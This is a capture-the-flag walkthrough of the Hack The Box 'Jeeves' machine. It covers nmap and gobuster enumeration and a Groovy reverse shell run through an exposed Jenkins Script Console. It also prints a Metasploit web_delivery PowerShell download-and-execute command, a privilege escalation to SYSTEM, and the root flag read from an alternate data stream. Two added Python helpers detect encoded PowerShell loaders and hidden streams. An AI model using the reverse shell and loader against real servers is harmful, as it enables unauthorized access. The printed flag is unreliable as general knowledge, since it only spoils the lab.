Jeeves is a challenging box that tests the user’s ability to enumerate web directories, upload reverse shell code, and escalate privileges with metasploit. The creator of this box also tries to trick the user by hiding the flag, but it is easily uncovered with a few additional commands.

Step 1: Enumerate with NMAP

We start our investigation by scanning the target with NMAP.

➜  jeeves nmap -vv -A 10.129.213.25 -p- -Pn                                    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-02-02 21:50 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:50
Completed Parallel DNS resolution of 1 host. at 21:50, 0.03s elapsed
Initiating Connect Scan at 21:50
Scanning 10.129.213.25 [65535 ports]
Discovered open port 80/tcp on 10.129.213.25
Discovered open port 445/tcp on 10.129.213.25
Discovered open port 135/tcp on 10.129.213.25
Discovered open port 50000/tcp on 10.129.213.25
Connect Scan Timing: About 12.99% done; ETC: 21:54 (0:03:28 remaining)
Connect Scan Timing: About 40.51% done; ETC: 21:52 (0:01:30 remaining)
Connect Scan Timing: About 67.21% done; ETC: 21:52 (0:00:44 remaining)
Completed Connect Scan at 21:52, 124.20s elapsed (65535 total ports)
Initiating Service scan at 21:52
Scanning 4 services on 10.129.213.25
Completed Service scan at 21:52, 6.59s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.213.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:52
NSE Timing: About 99.82% done; ETC: 21:52 (0:00:00 remaining)
Completed NSE at 21:53, 40.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.40s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Nmap scan report for 10.129.213.25
Host is up, received user-set (0.033s latency).
Scanned at 2023-02-02 21:50:09 EST for 172s
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-02-03T07:52:22
|_  start_date: 2023-02-03T07:48:59
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 36704/tcp): CLEAN (Timeout)
|   Check 2 (port 43812/tcp): CLEAN (Timeout)
|   Check 3 (port 42756/udp): CLEAN (Timeout)
|   Check 4 (port 14047/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m58s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.20 seconds

We can see that we have web applications running on ports 80 and 50000. Let’s check out each of the sites.

Step 2: Enumerating the Web Applications

We need to enumerate two web applications. We can use Gobuster to check for any unknown files or folders. We tried several wordlists on port 80, but we were unable to uncover any meaningful files or directories. Afterwards, we focused our attention on port 50000. We were able to uncover a directory on the second web application.

➜  jeeves gobuster -w /opt/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.129.213.25:50000

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.129.213.25:50000/
[+] Threads      : 10
[+] Wordlist     : /opt/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2023/02/16 12:32:57 Starting gobuster
=====================================================
/askjeeves (Status: 302)
=====================================================
2023/02/16 12:50:47 Finished
=====================================================

Upon visiting the page we see that we are on a Jenkins admin panel. After some exploring we uncover a script page at Manage Jenkins > Script Console. The page says that it will run an arbitrary Groovy script, so perhaps we can run a reverse shell there to gain access to the target.

Step 3: Uploading and Connecting to the Reverse Shell

Upon searching Google for Groovy reverse shells we stumble upon the following page: https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6. We are provided with a sample script that we can edit for our own use.

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We can simply edit the script to point to our own IP address and port.

String host="10.10.16.12";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We need to set up our listener before running our script:

➜  jeeves nc -lvnp 4444                   
Listening on 0.0.0.0 4444

We can now upload and run the script. We are immediately given access to the server.

➜  jeeves nc -lvnp 4444                   
Listening on 0.0.0.0 4444
Connection received on 10.129.213.25 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>

We can quickly grab the user flag before moving on to privilege escalation.

Step 4: Migrating to a Meterpreter Session

We have a basic shell, but our enumeration and exploitation potential will be far greater if we can migrate to a meterpreter shell.

msf6 > use exploit/multi/script/web_delivery 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python



View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > set srvhost 10.10.16.12
srvhost => 10.10.16.12
msf6 exploit(multi/script/web_delivery) > set srvport 4445
srvport => 4445
msf6 exploit(multi/script/web_delivery) > set lhost 10.10.16.12
lhost => 10.10.16.12
msf6 exploit(multi/script/web_delivery) > set lport 4446
lport => 4446
msf6 exploit(multi/script/web_delivery) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Python
    1   PHP
    2   PSH
    3   Regsvr32
    4   pubprn
    5   SyncAppvPublishingServer
    6   PSH (Binary)
    7   Linux
    8   Mac OS X


msf6 exploit(multi/script/web_delivery) > set target 2
target => 2

msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 10.10.16.12:4446 
[*] Using URL: http://10.10.16.12:4445/2TNX91PpvY8EvD
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbQAwAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbQAwAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMQAyADoANAA0ADQANQAvADIAVABOAFgAOQAxAFAAcAB2AFkAOABFAHYARAAvAGYASQBHAGMASQBqAFYAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADEAMgA6ADQANAA0ADUALwAyAFQATgBYADkAMQBQAHAAdgBZADgARQB2AEQAJwApACkAOwA=

We then need to paste the above PowerShell command into our existing shell.

C:\Users\Administrator\.jenkins>powershell.exe -nop -w hidden -e <encoded command from above>
powershell.exe -nop -w hidden -e <encoded command from above>
#< CLIXML

We are then given a meterpreter shell on the target.

[*] 10.129.213.25   web_delivery - Delivering AMSI Bypass (1387 bytes)
[*] 10.129.213.25   web_delivery - Delivering Payload (3507 bytes)
[*] Sending stage (175686 bytes) to 10.129.213.25
[*] Meterpreter session 1 opened (10.10.16.12:4446 -> 10.129.213.25:49678) at 2023-02-16 13:19:50 -0500
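A defender who finds a `powershell.exe -nop -w hidden -e ...` line like the one above in process-creation logs has to decode it before it can be judged. The following Python helper is an added example, not code from this writeup or from Metasploit: it decodes the `-e` argument the way PowerShell does (base64 of UTF-16LE text), flags the download-and-execute indicators, and runs against a constructed command that mimics the web_delivery one-liner (the host and port are the writeup's, the URL path is made up).

```python
import base64
import re
from typing import Dict, Optional

# Indicators that a command line downloads and executes a remote stage.
# These patterns match the shape of the web_delivery one-liner above.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.IGNORECASE),
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "download_string": re.compile(r"\.DownloadString\(", re.IGNORECASE),
    "webclient": re.compile(r"Net\.WebClient", re.IGNORECASE),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are
# the spellings commonly seen in logs.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -e/-enc, or None if absent or malformed.

    PowerShell expects base64 of the UTF-16LE script text, so decoding the
    bytes as UTF-8 would yield NUL-padded garbage instead of the script.
    """
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command(cmdline: str) -> Dict[str, object]:
    """Decode the command line if needed and report which indicators fire.

    'suspicious' is set when the script both evaluates code (IEX) and fetches
    it over HTTP, which is the pattern of a remote-stage loader.
    """
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    flags = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {
        "decoded": decoded,
        "flags": flags,
        "urls": URL_RE.findall(decoded or cmdline),
        "suspicious": "iex" in flags and "download_string" in flags,
    }


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument exactly as PowerShell expects it
    (UTF-16LE, then base64). Used here only to construct the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample with the same shape as the web_delivery command in the
# writeup; host and port are the writeup's, the URL path is made up.
SAMPLE_SCRIPT = (
    "$m0=new-object net.webclient;"
    "IEX ((new-object Net.WebClient).DownloadString('http://10.10.16.12:4445/EXAMPLEPATH'));"
)
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -e " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for key, value in triage_command(SAMPLE_CMDLINE).items():
        print(f"{key:>10}: {value}")
```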

Step 5: Finding Potential Exploits with the Local Exploit Suggester

We can use Metasploit’s local exploit suggester to find potential exploits against the target.

msf6 exploit(multi/script/web_delivery) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/script/web_delivery) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.213.25 - Collecting local exploits for x86/windows...
[*] 10.129.213.25 - 181 exploit checks are being tried...
[+] 10.129.213.25 - exploit/windows/local/bits_ntlm_token_impersonation: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.213.25 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bits_ntlm_token_impersonation            Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/ms16_075_reflection_juicy                Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 11  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 12  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 13  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 14  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 15  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 16  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 17  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 18  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 19  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 20  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 21  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 22  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 23  exploit/windows/local/ms10_015_kitrap0d                        No                       The target is not exploitable.
 24  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows 10 (10.0 Build 10586). is not vulnerable
 25  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 26  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 27  exploit/windows/local/ms14_058_track_popup_menu                No                       Cannot reliably check exploitability.
 28  exploit/windows/local/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.
 29  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 30  exploit/windows/local/ms15_051_client_copy_image               No                       The target is not exploitable.
 31  exploit/windows/local/ms16_016_webdav                          No                       The target is not exploitable.
 32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.
 33  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 34  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 35  exploit/windows/local/ntapphelpcachecontrol                    No                       The target is not exploitable.
 36  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 37  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 38  exploit/windows/local/ppr_flatten_rec                          No                       The target is not exploitable.
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 40  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 41  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed

We tried a few of the highly rated exploits, but we were only able to make progress with exploit/windows/local/ms16_075_reflection_juicy.

Step 6: Escalating Privileges

We can now use the exploit/windows/local/ms16_075_reflection_juicy exploit to compromise the target.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection_juicy) > show options

Module options (exploit/windows/local/ms16_075_reflection_juicy):

   Name     Current Setting                         Required  Description
   ----     ---------------                         --------  -----------
   CLSID    {4991d34b-80a1-4291-83b6-3328366b9097}  yes       Set CLSID value of the DCOM to trigger
   SESSION                                          yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  none             yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.173    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_075_reflection_juicy) > sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  1         meterpreter x86/windows  JEEVES\kohsuke @ JEEVES  10.10.16.12:4446 -> 10.129.213.25:49680 (10.129.213.25)

msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set lhost 10.10.16.12
lhost => 10.10.16.12
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set lport 4446
lport => 4446
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run


msf6 exploit(windows/local/ms16_075_reflection_juicy) > run

[-] Handler failed to bind to 10.10.16.12:4446:-  -
[-] Handler failed to bind to 0.0.0.0:4446:-  -
[+] Target appears to be vulnerable (Windows 10 (10.0 Build 10586).)
[*] Launching notepad to host the exploit...
[+] Process 3584 launched.
[*] Reflectively injecting the exploit DLL into 3584...
[*] Injecting exploit into 3584...
[*] Exploit injected. Injecting exploit configuration into 3584...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.213.25

[*] Meterpreter session 2 opened (10.10.16.12:4446 -> 10.129.213.25:49694) at 2023-02-16 13:30:57 -0500


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

After supplying the required arguments and running the exploit we are presented with a SYSTEM shell. The two "Handler failed to bind" warnings appear because the web_delivery job from Step 4 is still listening on port 4446; that existing handler is what catches the new connection, so session 2 opens on it anyway. We now need to grab the flag.

Step 7: Accessing the Flag

After navigating to the administrator’s desktop we are unable to find a flag, but we have a hint as to how to access it. Upon reading the file titled hm.txt, we are presented with the following:

meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  797   fil   2017-11-08 09:05:18 -0500  Windows 10 Update Assistant.lnk
100666/rw-rw-rw-  282   fil   2017-11-03 22:03:17 -0400  desktop.ini
100444/r--r--r--  36    fil   2017-12-24 02:51:10 -0500  hm.txt

meterpreter > cat hm.txt
The flag is elsewhere.  Look deeper.

We can drop into a system shell and use dir /R, which lists alternate data streams, to reveal data hidden behind the visible files:

meterpreter > shell
Process 4696 created.
Channel 2 created.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Documents and Settings\Administrator\Desktop>dir /R
dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Documents and Settings\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
				    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
	       2 File(s)            833 bytes
	       2 Dir(s)   2,591,989,760 bytes free

C:\Documents and Settings\Administrator\Desktop>more < hm.txt:root.txt:$DATA
more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530

We are able to view the contents of the flag by redirecting the hm.txt:root.txt stream into more. The only step remaining is to submit the flag.
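An administrator auditing a host for data tucked into alternate data streams often has only dir /R output (or a log of it) to work from. The following Python parser is an added example, not part of the original writeup: it reads dir /R output in the format shown above, maps each file to its named streams, and filters out streams that ordinary tooling writes (such as the mark-of-the-web Zone.Identifier) so that only unexpected streams like hm.txt:root.txt are reported. The sample listing is constructed to match the writeup's format, with an extra Zone.Identifier entry to exercise the filter.

```python
import re
from typing import Dict, List, Tuple

# A stream line printed by `dir /R` carries no date: only whitespace, the
# stream size and name:stream:$DATA. Ordinary entries begin with a date.
STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")
FILE_LINE = re.compile(
    r"^\d{2}/\d{2}/\d{4}\s+\d{2}:\d{2}\s+[AP]M\s+(?:<DIR>|[\d,]+)\s+(.+?)\s*$"
)

# Streams that common tooling writes routinely (e.g. the mark-of-the-web
# Zone.Identifier on downloaded files); anything else is reported for review.
BENIGN_STREAMS = {"Zone.Identifier", "SmartScreen", "encryptable"}


def parse_dir_r(output: str) -> Dict[str, List[Tuple[str, int]]]:
    """Map each listed file to the named alternate data streams shown under it.

    Files with no named stream still appear with an empty list, so a caller
    can distinguish "checked, nothing attached" from "never listed".
    """
    streams: Dict[str, List[Tuple[str, int]]] = {}
    for line in output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size, filename, stream = m.groups()
            streams.setdefault(filename, []).append((stream, int(size.replace(",", ""))))
            continue
        m = FILE_LINE.match(line)
        if m and m.group(1) not in (".", ".."):
            streams.setdefault(m.group(1), [])
    return streams


def suspicious_streams(output: str) -> List[Tuple[str, str, int]]:
    """Return (file, stream, size) for every named stream outside the benign set."""
    return [
        (filename, stream, size)
        for filename, items in parse_dir_r(output).items()
        for stream, size in items
        if stream not in BENIGN_STREAMS
    ]


# Constructed sample in the format shown in the writeup; the Zone.Identifier
# entry is added to exercise the benign filter.
SAMPLE_OUTPUT = """\
 Volume in drive C has no label.
 Volume Serial Number is 0000-0000

 Directory of C:\\Users\\example\\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
                                    26 Windows 10 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)   2,591,989,760 bytes free
"""

if __name__ == "__main__":
    for filename, stream, size in suspicious_streams(SAMPLE_OUTPUT):
        print(f"{filename}: unexpected stream '{stream}' ({size} bytes)")
```

Feed it the saved output of `dir /R /S` from a directory tree to sweep a whole volume rather than one folder.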